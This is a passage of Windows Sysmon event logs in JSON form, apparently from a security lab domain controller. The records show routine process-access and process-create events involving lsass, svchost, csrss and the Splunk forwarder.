C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010AABE0300}","TargetProcessId":"2612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2632\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2632","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.969\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-0010AABE0300}\r\nSourceProcessId: 2612\r\nSourceThreadId: 2524\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.969","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-0010AABE0300}","SourceProcessId":"2612","SourceThreadId":"2524","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.015\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nProcessId: 3856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.015","ProcessGuid":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.000\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.000","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.000\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.000","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 